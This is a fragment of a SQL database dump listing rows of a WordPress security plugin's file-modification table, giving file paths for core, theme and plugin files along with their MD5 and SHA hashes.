(0x6d173038e57e6084727999632002a1eb, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_6_24px.svg', 0, 0x616f77cd2d2fffe489c9c8500eed3d3a, 0x616f77cd2d2fffe489c9c8500eed3d3a, 0x8715770f82119590b2ce0c0e4754afbcc2aec27cb0e3f53c3ef4e99d2ff8779e, '', 0, '?'),
(0x6d20baa095b3f5ceca61bc643794f47a, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/percent.svg', 0, 0x6e81b2b0a083f6fd608f8f6c35b85a0d, 0x6e81b2b0a083f6fd608f8f6c35b85a0d, 0x44626a137e568a3e8999987972ba45b4ebd23686037589ce31da6ae9022674c9, '', 0, '?'),
(0x6d342bb82fabeb5e5957ca79d369ee1c, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/switch.php', 0, 0x797c969425fb57ba3549889d1f6dcc6b, 0x797c969425fb57ba3549889d1f6dcc6b, 0x993d381708e0dba04bdb38981cfc4472b2e8ddebeb82a9c0ff7340d4ec20bd0c, '', 0, '?'),
(0x6d3aa77aa4a2f31e9d6ddc7d0f3ac246, 'wp-content/plugins/Ultimate_VC_Addons/admin/vc_extend/js/ultimate-border.js', 0, 0xd56602dca75e0669fdcf844459e7dbd2, 0xd56602dca75e0669fdcf844459e7dbd2, 0x70b8e5a6af7422d9c62dc0c0ec54d28b88ad68966a808db46fb4fc1db1cfddc4, '', 0, '?'),
(0x6d410303c270e4d7093197de47f5552f, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php', 1, 0x00000000000000000000000000000000, 0x1171291a36cb8ffe72d1310a31ddda91, 0x24f8cc491e2ed71ad6dddab4e27dd22769bbad9e44353056912d054228168df6, '', 0, '?'),
(0x6d41e7f059b7e0cac0ae52627cde538e, 'wp-includes/ms-default-constants.php', 1, 0x00000000000000000000000000000000, 0xbb4b4c4d7777fb903b4e69b52f9e302a, 0xf49750ef92a104a402273f9d6f82784730def141c75da14bbe8ca229373e4637, '', 0, '?'),
(0x6d459aaff1f6beba5ce71529ded86fd4, 'wp-includes/js/jquery/ui/spinner.min.js', 1, 0x00000000000000000000000000000000, 0xa597d68b588efa4b8896beea6582c62c, 0x4d9fb3f8ae2d1bba209b9ccc4c8080e96873a84af0f5108ccd8d84b48c439642, '', 0, '?'),
(0x6d5068dfc3572fae6f9f4084cf9a98a6, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/users.svg', 0, 0x7b4c74d32c6192fa5cb3c4dcb403efd1, 0x7b4c74d32c6192fa5cb3c4dcb403efd1, 0xf5e096fac90e0138d7601b3fd4604e5ddfe8bbb29de0e45a976ad1d4a6fc8bb1, '', 0, '?'),
(0x6d52a83b04b580dd1d34e5d711ea83f1, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet.svg', 0, 0xe54737c2726ff9b039a7e589d902f93e, 0xe54737c2726ff9b039a7e589d902f93e, 0x48f5309e27dc81f06cc8d8d7394c862d52daabb846c54e50f1aa6b92df21cee7, '', 0, '?'),
(0x6d59b7c118939a0c7d10c9bdeb0b853f, 'wp-includes/js/jquery/jquery.ui.touch-punch.js', 1, 0x00000000000000000000000000000000, 0x4cc86d1003c45134d6838f13e3885db1, 0x6b0e3e1d6a5440a9978e7accc3c81eafea16d59c2e4f42d7c06ac93027f4ea74, '', 0, '?'),
(0x6d73e25aa1da472b81f21b498d01c738, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/simple-hint.js', 0, 0x53d28d8109faf1740c237a3eff1cafcb, 0x53d28d8109faf1740c237a3eff1cafcb, 0xa4821cbdcf8d37b5453c14179a6e1498e1cc552cd0b991dc1337d39f1a6ba290, '', 0, '?'),
(0x6d7c7303f9231650d6cddff480d25e82, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_9_24px.svg', 0, 0x66b3d9840899f72171d70aa7ab751a60, 0x66b3d9840899f72171d70aa7ab751a60, 0x89a69fcfd4d9bbf02922ab16f03e14dabda228d11ec844a4fff69beb0d86f535, '', 0, '?'),
(0x6d841165ba231fba45d154e6a9d0bffa, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_room_24px.svg', 0, 0x49827d1919d49a5ea8d1deb5ca511a77, 0x49827d1919d49a5ea8d1deb5ca511a77, 0x5c5d3ae3b330b2c363f8b04137926bf6bfb154bea7e560aaa30ec60928fd9c00, '', 0, '?'),
(0x6d8808ba2d1a6d31bda5c8fba377c7ef, 'wp-includes/js/jquery/ui/sortable.min.js', 1, 0x00000000000000000000000000000000, 0xefa8171f2226a422003417095d8549dd, 0x50cc939fb6590712136ce44d791a6a0b5fc9d641a7d507f90707a333b8b976da, '', 0, '?'),
(0x6d9d83d76a6fc89436fe51c4f3d802cf, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_return_24px.svg', 0, 0x1b8e10d9c117f81ccc4e6be1abf9b1d6, 0x1b8e10d9c117f81ccc4e6be1abf9b1d6, 0xb010a88d2c05ee1222a9ac228f17445f1567c51602ed991b43369c34b7488e87, '', 0, '?'),
(0x6dd0685aca98c2ee9c64ce3ded345d6d, 'wp-content/plugins/js_composer/config/content/shortcode-vc-zigzag.php', 0, 0x8b1cf84dd18bad51bc838f4a701bc9d4, 0x8b1cf84dd18bad51bc838f4a701bc9d4, 0x5f5fd71f460bdcdeb9ffdb59b124eaaeeabcea61cdec28876a3a71871a409f71, '', 0, '?'),
(0x6deabb244da3a55af2baae796704edf5, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_library_24px.svg', 0, 0xc7ba69a21e85a50e1a4b43de115e226c, 0xc7ba69a21e85a50e1a4b43de115e226c, 0x67a8bdc163d7a4981f19cd038d8959b48ca63afa98f9181d17b5437a2bd0f73a, '', 0, '?'),
(0x6df03668b9d0f0b60744ee468cc31d0a, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_airport_24px.svg', 0, 0xdd7d6608aee4598aad3658fd71279af7, 0xdd7d6608aee4598aad3658fd71279af7, 0x71d3f3023aff49f3cb0b1c5cef34c01c429fdb54da9940de6fe4f940a1f76d73, '', 0, '?'),
(0x6dfd9de46a805425f1576f60014a2872, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/images/vc_gallery.js', 0, 0xb461ff75560d8c3542b762b2b70aacfe, 0xb461ff75560d8c3542b762b2b70aacfe, 0x5611e86e639afe39e21539634cf06c8cd62789b2395c7d3cf565c730ef904bc1, '', 0, '?'),
(0x6e0251b8caca9227946bc3de222511e3, 'wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css', 1, 0x00000000000000000000000000000000, 0xc53c2f4dd23046ce2127477792aecb20, 0x5d0fbe9c4fc516980becfa9b3f88d5b8b8ec183ed0587ac56225b19bd8a31194, '', 0, '?'),
(0x6e0e0e5dfb6a16373c331349537351df, 'wp-admin/images/post-formats32-vs.png', 1, 0x00000000000000000000000000000000, 0xb7742e45b6adea3547a54e1af3fe761c, 0x285aa82c859ceeaa496dad592cce87fcd497f1c674479fa9a39efaafb8ab611b, '', 0, '?'),
(0x6e0e5b0906167f58948712837dc93082, 'wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php', 1, 0x00000000000000000000000000000000, 0x17cae125d8983588d061e54fb55fb490, 0xb433c2bd7d98df88db36a818ac122d8ca71407dcc21f05b995782582187576a1, '', 0, '?'),
(0x6e14c5b22813fb782c3d604c5557d9d8, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_dialer_sip_24px.svg', 0, 0xc325e4741e93dfb8b40ec0d19351c62c, 0xc325e4741e93dfb8b40ec0d19351c62c, 0x997c2bb0fe1316265dcdb670899827eb81468adeb6744d8572b6e128b93e7465, '', 0, '?'),
(0x6e23a9743d95278592c1def5625d7bf1, 'wp-includes/js/tinymce/themes/modern/theme.min.js', 1, 0x00000000000000000000000000000000, 0xee75ddd3e6a9b205b105d05e9dac72d1, 0x4dfbd32f8c916f9a58235ed59332f212f7dc873c2ee4e6534b3886f205987b63, '', 0, '?'),
(0x6e306d5f658fb970ebb6d9930fa75670, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_assistant_24px.svg', 0, 0xa91c61d7c4ac2bcdacda63096faf7d73, 0xa91c61d7c4ac2bcdacda63096faf7d73, 0xa107421e2211517c5f5a8444c36c141f25d340d72d5244fdd412effa9842641e, '', 0, '?'),
(0x6e36f7dad9ad1594c2a2333e3dfb8801, 'wp-content/themes/Impreza/functions.php', 0, 0x8e9b3d08470fd712417efbd05455f3b1, 0x8e9b3d08470fd712417efbd05455f3b1, 0xf1e459f665790c612fa6a2f4248c9946755b58c735bec74d1aeef8414eb59f94, '', 0, '?'),
(0x6e416a2bb475aa1dfa0456471e376414, 'wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php', 1, 0x00000000000000000000000000000000, 0xf8d98f386c081fbca19f05fdb425c2e3, 0x215d605f2e95dbd75cb2fd3f877f95208df02e1ab762a2f1c9904751c565296d, '', 0, '?'),
(0x6e5a2f31543a7b265e842f086ebffd86, 'wp-admin/js/media-gallery.js', 1, 0x00000000000000000000000000000000, 0x875c61d7e23f27e63c483f1cfaa4d049, 0xf623453944551de20c07907c63dbb36bfa48037a8e0f9705c10c5f083be22bf7, '', 0, '?'),
(0x6e5cbc7eb88e30d8b8e5cb4c95a3f22d, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_hot_tub_24px.svg', 0, 0x50c6ad5f624e55631b5d7acdd01c1ce9, 0x50c6ad5f624e55631b5d7acdd01c1ce9, 0x2e81ec70412b51e076fcfbade967655d092756228bbff7c87bfcd11dc77d0c17, '', 0, '?'),
(0x6e6566beb3b04140b4ffb952873fa4fd, 'wp-includes/js/jquery/ui/position.min.js', 1, 0x00000000000000000000000000000000, 0xe7346f4d2945cebe75bd53cf232f927e, 0x369c5dd170e5743d56cbd908fdefc85888daa6f5e1adf214bfe266591d8d9deb, '', 0, '?'),
(0x6e9334ed3255ed344e8f1a62746d4e6c, 'wp-content/plugins/js_composer/include/params/vc_grid_item/editor/popups/class-vc-templates-editor-grid-item.php', 0, 0x39d4d6938db01c46d3911ce6bbd945ed, 0x39d4d6938db01c46d3911ce6bbd945ed, 0xd39fe5c18f36362df02897e26e5e855e30bface09e3d7d6780ab16a0d1b8cdec, '', 0, '?'),
(0x6e93c6edc44092a741068ef9114607b4, 'wp-admin/network/sites.php', 1, 0x00000000000000000000000000000000, 0x36631c365bdae083c16ddea740c97dd1, 0xd4c3e924a0566b1f19088116e7141e1b92fb9bd9faa7e931ae8fa3a5a3353226, '', 0, '?'),
(0x6ec5a2a829e1ae630e889bde71145e22, 'wp-includes/Requests/Exception/HTTP/503.php', 1, 0x00000000000000000000000000000000, 0x3906f7520861c39f43f46000d45554b4, 0xbe7db6ac3d33027806fb411039bcaaf1cb6c8fab70010082c6b0d339652e134f, '', 0, '?'),
(0x6ee3d0ba0b9d99d30c76fd6e6a3dcdae, 'wp-admin/includes/class-bulk-plugin-upgrader-skin.php', 1, 0x00000000000000000000000000000000, 0xdf83ef6cc53d1fd92a66dcb74739dd9c, 0xe68ecd8bc88cb1f5cb80478fc100fc07b79d637b3ee22e14be2727913165e52c, '', 0, '?'),
(0x6ee51e85b3e207f458400ae226f43aa7, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-images-carousel.php', 0, 0xe63e1e321bed7ae645865a7b4952926a, 0xe63e1e321bed7ae645865a7b4952926a, 0x49be80af88c5eba8bb50abbff13c8b233e8888d286c35d1ee11340e78ec7f2a2, '', 0, '?'),
(0x6ef3caf3308d16390f6aae760138f522, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php', 1, 0x00000000000000000000000000000000, 0x4356b1532b3a63f7a67c4fecac8b0917, 0x02ea74e53d8d31bf691a166e004e2113b6f695a7c72aa5dd11101769878dba46, '', 0, '?'),
(0x6ef7b3a971ad52fbe05bd10d098195d8, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/masonry.js', 0, 0x0febdbc921cfe1231cf29b2cde7e4286, 0x0febdbc921cfe1231cf29b2cde7e4286, 0xd38bc561d4d916af88eaefe2dfbd19b2ae049e096345e2866a75422af58f4f6a, '', 0, '?'),
(0x6effaedb97d4f076580f064829e90717, 'wp-includes/sodium_compat/src/Core32/Curve25519/README.md', 1, 0x00000000000000000000000000000000, 0x1659a2aacf9bd1767f6a9fd70ac085cf, 0xe31553d30b7801965ef6563e6dd0212daa71ecf7ccf144d96556d1dfce06c8e8, '', 0, '?'),
(0x6f0d94f73b8686ce6d394ff7692bff74, 'wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/auto-update/index.php', 0, 0x34b7f39083f7c15c8a4cc4349b66e82b, 0x34b7f39083f7c15c8a4cc4349b66e82b, 0xe3749c8eccc20fd4af8148115c4ff912cab94c3e456e22f9eef7b3837fe09e29, '', 0, '?'),
(0x6f275244172d94dc0001b6b1a16f89c9, 'wp-content/plugins/wordfence/images/support.svg', 1, 0x00000000000000000000000000000000, 0xac436ce21624a38772bc93a3bc6e3c2e, 0x8eca241ee34dfba1d4aea626e6e2c328e1a99873acb5145e0916cfa22a4ec0de, '', 0, '?'),
(0x6f2eba35550bbc3484b9dfc1f198622a, 'wp-content/plugins/js_composer/include/params/gutenberg/class-vc-gutenberg-param.php', 0, 0x776df91e9bf47a4d4784eb19ac51fe37, 0x776df91e9bf47a4d4784eb19ac51fe37, 0xd10a60834ae5056c59d0bb219a902a3fb11eb1065880c09e0c86999fe9c4ced2, '', 0, '?'),
(0x6f3169f04c35b893cf7a16ae24b7f537, 'wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php', 1, 0x00000000000000000000000000000000, 0xbb7531f2c85cc8c1389d8b823b236a2d, 0x508db5b2ea840e7cb16c9316125f8b83ef5a85c8337a3c4ec9a7054bfddfce13, '', 0, '?'),
(0x6f3b54d1759c0cc24153d912dacde7b5, 'wp-content/plugins/js_composer/include/autoload/bc-multisite-options.php', 0, 0x6ac4a604e5cb5b9ffd25031867979af7, 0x6ac4a604e5cb5b9ffd25031867979af7, 0xe170347c88f664cc46aeb54047644ab36d9845f5cf78efd0a6432b7c6dcafbe8, '', 0, '?'),
(0x6f43c922c0cf058551b8ebe07483d179, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php', 1, 0x00000000000000000000000000000000, 0xb108c22b05c1eb021d92fe071706f525, 0xc1063421fd8848fc1c3a8d363ecb6c45eee64563239cd0d8f961057b9d41b47b, '', 0, '?'),
(0x6f50f0fb1463998781ec6fa92ee47214, 'wp-includes/js/tinymce/skins/lightgray/img/object.gif', 1, 0x00000000000000000000000000000000, 0xf3726450d7457d750a2f4d9441c7ee20, 0x86a0231f3b1f21e4e1490ca7882ec03ee7751cca8df253568edd6d7b7cf1652d, '', 0, '?'),
(0x6f511c36b639f91935b631527a2472f2, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_1_2.php', 0, 0x2b934fd80b402861627da58743e4c909, 0x2b934fd80b402861627da58743e4c909, 0x966dffb6cecf9750103c9510c0155b6bbd00a6bd070412509ba5df0a41e3f88b, '', 0, '?'),
(0x6f535de37e28e411ef373be099a00d9c, 'wp-includes/js/dist/shortcode.js', 1, 0x00000000000000000000000000000000, 0xac3c48115c0205965fc697211684458d, 0x8b40c50655b9ee358f6fc44c64c24ccef28b8fbe7cf15acb707ccd3f8f7720f6, '', 0, '?'),
(0x6f54469413103ec015d425538c61e50e, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bookmark_24px.svg', 0, 0x1e3a98d67feab1544a4dc0c90b4152fd, 0x1e3a98d67feab1544a4dc0c90b4152fd, 0xa61552328473dc02acab80796e97c0e738221104cb4737efc6f8677711482468, '', 0, '?'),
(0x6f5a30861c9af7f9d1d81fd43c63cd30, 'wp-includes/SimplePie/IRI.php', 1, 0x00000000000000000000000000000000, 0x6e16ff20d3e68692cf3b617b875f36f5, 0xe1b10c605643533549d9ae1a3b263e0815ad78b70724afb6deed2de1260c7a2b, '', 0, '?'),
(0x6f6607063ee7b5f17dd0d17548035b3f, 'wp-content/plugins/js_composer/config/content/shortcode-vc-single-image.php', 0, 0xb6f0dd07cd8f67d002eaa7645f90fed2, 0xb6f0dd07cd8f67d002eaa7645f90fed2, 0x35f424443b8bb93cb3b1b1639981440a10ec95914b13c54208754d7d7d1208c4, '', 0, '?'),
(0x6f7963ce8fd987aac9c7f1d7149cf7e3, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_day_24px.svg', 0, 0x337539f83aade00255b9c83a0cd66b5f, 0x337539f83aade00255b9c83a0cd66b5f, 0xd2a1de4bc7740d35582229f38f3125826822a65e0d105a891610893e2bf0317e, '', 0, '?'),
(0x6f7ddb054319dc8a38f445f8ef4701f0, 'wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php', 1, 0x00000000000000000000000000000000, 0x8773544407b77ab8a4fcd2a7e96da216, 0xdd358ba9d884b23a2297737883ba1f34b7e7d2b8008fb18f39601a6903eb3f83, '', 0, '?'),
(0x6f838e7119b131bb43ad864374055eb5, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_cta_button.php', 0, 0xdcadeaaedad8efa253e9b20350629c29, 0xdcadeaaedad8efa253e9b20350629c29, 0x393ed4459e23d506988e65b09260b361b4e5815ea1166797d1d6ca12a1da4b5a, '', 0, '?'),
(0x6f8c0b6e9929886a3658217955ff28ae, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/stamp.svg', 0, 0x1c27e7696e8f88b20a3468f9540b95e3, 0x1c27e7696e8f88b20a3468f9540b95e3, 0x406d714b43e386c55ed2aba49b6b34164b5a1303ac0eefb6a6c2dfb83658a1a1, '', 0, '?'),
(0x6f9b28a476f289d53f9b31b3c1246e01, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phonelink_24px.svg', 0, 0x8f53d110341758098707c31b7ec10e57, 0x8f53d110341758098707c31b7ec10e57, 0xb5e961bebc41465c2e3187cf1c1a835d725953e7fc12f5407c0f19ad35aac877, '', 0, '?'),
(0x6fa0e308b6d324e95a772daa354c0add, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/browser01.svg', 0, 0xb605c9e5df0202ddcf0abdfe583dc0de, 0xb605c9e5df0202ddcf0abdfe583dc0de, 0xc1c8048bb41e1d51a7830d0301162efcecc83d825658b0de4e6808d232639b8b, '', 0, '?'),
(0x6fabe8fb5e346cf23a4b60dc9b3138bf, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_circle_outline_24px.svg', 0, 0x2f5085dc8f1b250dbb107eaa39657afb, 0x2f5085dc8f1b250dbb107eaa39657afb, 0xa53fb336b449295e0746db9cb2805154be256171ba77c52c54d60b4baac9e34b, '', 0, '?'),
(0x6fac7081d3084fba4c6eb6e93b023cc5, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_range_slider.php', 0, 0xb43fb4ea5deec49f553d16ba0810ef31, 0xb43fb4ea5deec49f553d16ba0810ef31, 0xeb7a1918d2154659f799d3fcb63dfe0b45e100a68e278b8714f78b2c967d666a, '', 0, '?'),
(0x6fb29de1d280f10d219d46b7073af029, 'wp-content/themes/Impreza/framework/functions/breadcrumbs.php', 0, 0x0189644bf02205c612cad922379c0213, 0x0189644bf02205c612cad922379c0213, 0xd74dfe579c04c7e8b5ef10ad49c53cba5953b4d75f962fe7ea64d340f600709c, '', 0, '?'),
(0x6fbf77072af60ace9bcea247d29c9d5d, 'wp-content/plugins/wordfence/modules/login-security/img/header.svg', 1, 0x00000000000000000000000000000000, 0x70dce8b1d1c75dea6a2de39114f8a699, 0x389afc05bbd4da23cc84280338f8e1ff884ffb227fc7092b186822466296ec83, '', 0, '?'),
(0x6fc5a31665f95a576bec0abe56b6a1ec, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-section.svg', 0, 0x3cc3a6afa71322309136c550f9060d96, 0x3cc3a6afa71322309136c550f9060d96, 0x1eaded32798f731b062aa35af1d49a2e8a6d763ae3aa2561a4567beb5e117dbf, '', 0, '?'),
(0x6fd171cef9f57fe58fe6181623eee8e8, 'wp-content/plugins/revslider/admin/assets/imports/photography/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x6fe091dcb1a875c405068602fed71804, 'wp-content/plugins/js_composer/include/classes/core/access/class-vc-current-user-access.php', 0, 0x3d0f29a99ba0fe0e4f24c9466c54bf91, 0x3d0f29a99ba0fe0e4f24c9466c54bf91, 0x1e45d98edb46b09d0c61cb1ab3c89fc0a6cbfe7406523c3bec6ec93748a5bef7, '', 0, '?'),
(0x6fe3ae9a2d01d73b3f583a8ffb70d2a1, 'wp-trackback.php', 1, 0x00000000000000000000000000000000, 0xd74b02cd709360ef78dc226cdbabce91, 0x3b471ba23629382fa2963a1c159ad52f866318d942140fc27d5d9b1cab238f65, '', 0, '?'),
(0x6fe4d9c008dff9598ac6da8594cc58bc, 'wp-content/plugins/wordfence/images/flags.png', 1, 0x00000000000000000000000000000000, 0x5737cc2003828c28d0cbbf21ad1a37d4, 0x427808f630254c79b53690f805fa05211e97f3585c7a2f3ca06eb2363d1a57c4, '', 0, '?'),
(0x6fed935bacd06e337582c8cab99f5035, 'wp-admin/options-general.php', 1, 0x00000000000000000000000000000000, 0x25475572b4b2ef6fb7ef546f675e53e1, 0x97e5a49b282bb0d4f6d3f9357f8324ce45c3d149c976e228567fec92235b1e10, '', 0, '?'),
(0x7001f4f43775cc4ccd5f7f7b32c39b96, 'wp-includes/js/jquery/ui/draggable.min.js', 1, 0x00000000000000000000000000000000, 0x1b571c6695d5b8dc97ff051254fa953c, 0xa8837dc6f48bf8b58b618f2996a0b4cba8afcfbd6ae28003adfb7c7b8c1885ef, '', 0, '?'),
(0x7001f6b1e08e2c07bc748fe1fa9003a0, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-single-image.svg', 0, 0xe97db8e5c77c6e12ae3a7c0ac268c943, 0xe97db8e5c77c6e12ae3a7c0ac268c943, 0x8bc741b867f64b6fac60bbeeb034fe4f5266c9ee6d860c2e9c8ad00b85deedba, '', 0, '?'),
(0x700e54032dab83395a603e7ee9d07fd9, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_more_24px.svg', 0, 0x7744e2f57ac9c54e76b9234cceb76cd1, 0x7744e2f57ac9c54e76b9234cceb76cd1, 0x24f3070a9d563f480d619dadc832471efe7fe3fab0d8e3090e2822557a3c553a, '', 0, '?'),
(0x70128f83d5f3b884ec4c0c7eb5d3cbac, 'wp-content/plugins/revslider/admin/views/templates/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x701b7b0db6a820e2253e2ffc5affeb3a, 'wp-content/plugins/wordfence/views/scanner/issue-base.php', 1, 0x00000000000000000000000000000000, 0xf5c7a2cf9a9cf27470b8bae89541790c, 0x38500b63c769088c43efddc0d551564a0cfb2b360e9afc3f70548c36051a7a64, '', 0, '?'),
(0x703a942caf604f1b6c4cb42810e9411b, 'wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php', 1, 0x00000000000000000000000000000000, 0x8df9c0ad7f899bbba1a51cbd2a736632, 0xf37c0ddfa33210ec9ebff3ea39f52f25170f5b87376d977b45e0ddfbf775932d, '', 0, '?'),
(0x703cfa21a780da88fb06b1a305a6a720, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file09.svg', 0, 0x5689bd03c517dcf7cb11052cf780a51d, 0x5689bd03c517dcf7cb11052cf780a51d, 0x101f3d377edf4d4ff12210128f637d7ba3635f323bf27b4cea201f93572480b2, '', 0, '?'),
(0x705579fc6109ea62afe07661843ba138, 'wp-includes/js/comment-reply.js', 1, 0x00000000000000000000000000000000, 0xbde01a471cbd94556bde642fb5d9a47e, 0xac0251a3c63d9ec04d30d67eaf742e74f4212f3eea4b9378c5d7e5f74c28b278, '', 0, '?'),
(0x7077e1d251841e4619e963d9dfa0622a, 'wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff', 1, 0x00000000000000000000000000000000, 0x4024c67147b9326b35070824a1867a94, 0xd686462a60dd27eaab4f2074b57269523aed6a30e1f392571a963da86a808b05, '', 0, '?'),
(0x7095f0b42ed0b00394f3815bc38d44a1, 'wp-includes/deprecated.php', 1, 0x00000000000000000000000000000000, 0x1536c131c15a55d6fc92f4b0ae47d51a, 0x9a669acd672ea679f6171eb1c67a1da3c1c77aed736ed07930d763bb2de9858c, '', 0, '?'),
(0x709a8866c8831d11aeb87e4a6bdfbd7c, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_radio_button_checked_24px.svg', 0, 0x2f14244fa15c46d094d26352fa47886b, 0x2f14244fa15c46d094d26352fa47886b, 0x24966ccbed50e736ebd6972273b5784e314558a336fb090230200ba092cad0ee, '', 0, '?'),
(0x70a6227cbd73bd4ffb47c0ee9416e833, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-hoverbox.php', 0, 0x9388abc83e9b2458df64be052ae8c3a5, 0x9388abc83e9b2458df64be052ae8c3a5, 0x27f91ced1f2638548abb870b4ccd5a35bacfed6834a383e72d7cc1b62bb01e1f, '', 0, '?'),
(0x70bbbc5c2a65eab60a0dcf88f3ebfaae, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php', 1, 0x00000000000000000000000000000000, 0xcd7aa73833d03f77cce9db02e6b1dc57, 0x0d2e6c5d5c29095af071bde9c6f51270c95d5f5ea975a89eb48e184a0aa425b2, '', 0, '?'),
(0x70cc9330a43240e306d8135046ce746b, 'wp-content/plugins/wordfence/views/common/unsubscribe.php', 1, 0x00000000000000000000000000000000, 0xf97d8d7daae0cf73024ae4e117f34b81, 0x6111eaa600c46b359717bccd09dd2dafb900026f44780516dba03875d0e92527, '', 0, '?'),
(0x70f09a64f2ff47736da2980e9c95d830, 'wp-content/maintenance/assets/timer.js', 0, 0x499b300b9119383489d4b56c00c1b346, 0x499b300b9119383489d4b56c00c1b346, 0x452e93c24f4bca0e1f9e0ba81af4bafbfab49fe5fb94fc3d4a44e34bae35bd25, '', 0, '?'),
(0x70f3098b772f4e6c8d43505d859455bd, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_bus_24px.svg', 0, 0x1a9a16ba56c18b96cff17e158a18715e, 0x1a9a16ba56c18b96cff17e158a18715e, 0x58ed4d4e6a88d1bb821e6cdaee59176bdac3785b3872f4c25c3b4864d63fdb82, '', 0, '?'),
(0x71037143b8a2248db21b9ee0fda88340, 'wp-content/plugins/wordfence/views/common/page-title.php', 1, 0x00000000000000000000000000000000, 0xc5dc6141273490f5063de306c147b367, 0x527b07f568ae433b03c55fc9ee090f8595f1ea472b527adf7254a5917a609e34, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0x711ed174e7b0bd290d509671875d24e2, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speech-bubble.svg', 0, 0x1815c324c87b3150d205c6c17db3bd55, 0x1815c324c87b3150d205c6c17db3bd55, 0x65056354bcf6bb8ba4aa260f6d82188bfd18fc3ef1eb5c44d4a106136be79d24, '', 0, '?'),
(0x71228d636febde19a33eab325268e95d, 'wp-admin/includes/plugin.php', 1, 0x00000000000000000000000000000000, 0x557e4794ee04ebe9f098f18f6ce58c69, 0xb8ac9554c8c6b286580b5a6ce804fc919e342071005275e14a460636166d2a05, '', 0, '?'),
(0x71357b10813875c064e0cbada75afbe6, 'wp-content/plugins/wp-super-cache/ossdl-cdn.php', 1, 0x00000000000000000000000000000000, 0x5df4f560dc5117fd946a5f1b9bc26c0a, 0xc7e02dfc47b08163d98a4bf9c179897aac04560641950b06cc2e702757c9cbd7, '', 0, '?'),
(0x714c8b05fc02e5f60f104910974c6383, 'wp-includes/class-wp-recovery-mode-link-service.php', 1, 0x00000000000000000000000000000000, 0xc359e736b47926be10b08f63c0dd5513, 0xe76195d0a32b031928f2c17c1c731c87e2c3d1a0336ee43dcb7e0869b267e452, '', 0, '?'),
(0x7168ff36361f3597797cf23def3f5309, 'wp-includes/js/jquery/jquery.serialize-object.js', 1, 0x00000000000000000000000000000000, 0xd15c29a18d9ffa8b9b4ae86c3c0cfa22, 0xeeef447b7a70bc0d5d8db5ff3ce6b005d1c0a78f89cb407f37023e302899bf68, '', 0, '?'),
(0x716ecc159fcb28140a85d687bb21fdcc, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/open-sign.svg', 0, 0xd3cba190ed5c4cd63bbc5cc7e55cc967, 0xd3cba190ed5c4cd63bbc5cc7e55cc967, 0x981a53dd68f24b613e562ca83dee7df2ec380355940e535704633c1b8a5511ee, '', 0, '?'),
(0x71762e659f8f13750957aedcf51b5048, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_power_settings_new_24px.svg', 0, 0x677b06dbbb458fbf8a40de2424043661, 0x677b06dbbb458fbf8a40de2424043661, 0x6631fef77ed1e04995e50a707c75521884f046ecbd4186d4bf67464beac11023, '', 0, '?'),
